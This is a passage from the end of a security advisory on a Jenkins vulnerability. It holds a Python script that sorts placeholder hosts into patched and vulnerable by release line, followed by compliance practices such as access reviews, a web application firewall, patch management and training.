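    """True when the version predates the fix for its own release line."""
    version = parse_version(text)
    return version < FIXED[release_line(version)]


def triage(hosts):
    """hosts: {hostname: reported version}. Returns a verdict per host and marks
    unparsable values (e.g. a proxy that strips the header) as unknown."""
    report = {}
    for host, header in hosts.items():
        try:
            version = parse_version(header)
        except ValueError:
            report[host] = {"version": header, "line": None, "vulnerable": None,
                            "action": "verify version manually"}
            continue
        line = release_line(version)
        vulnerable = version < FIXED[line]
        target = ".".join(str(x) for x in FIXED[line])
        report[host] = {"version": header, "line": line, "vulnerable": vulnerable,
                        "action": f"update to {target} or later" if vulnerable else "patched"}
    return report


# Constructed sample inventory (placeholder hosts, not real systems).
SAMPLE_HOSTS = {
    "ci-weekly-old.example": "2.550",
    "ci-weekly-new.example": "2.551",
    "ci-lts-old.example": "2.541.1",
    "ci-lts-new.example": "2.541.2",
    "ci-lts-ancient.example": "2.528.3",
    "ci-weekly-ancient.example": "2.541",
    "ci-unknown.example": "",
}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_HOSTS).items():
        print(host, verdict)
```

Note that weekly 2.541 (two components) is vulnerable while LTS 2.541.2 is patched, which a naive string comparison would get wrong.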

Compliance Best Practices

  • Establish a formal, quarterly access control review process for all Jenkins user roles and permissions to ensure accounts only have the minimum access required for their function.
  • Deploy and configure a Web Application Firewall (WAF) in front of the Jenkins instance to provide a protective layer against XSS and other common web application attacks.
  • Implement a comprehensive patch management policy and automated process for all tools within the CI/CD pipeline to ensure security updates are identified and applied within a defined timeframe.
  • Develop and mandate annual security training for all developers and DevOps engineers, with a specific module on securing the CI/CD pipeline and recognizing potential insider threat indicators.


Authors & Contributors

Brian Sayer (Author)

Threat Intelligence Analyst, F5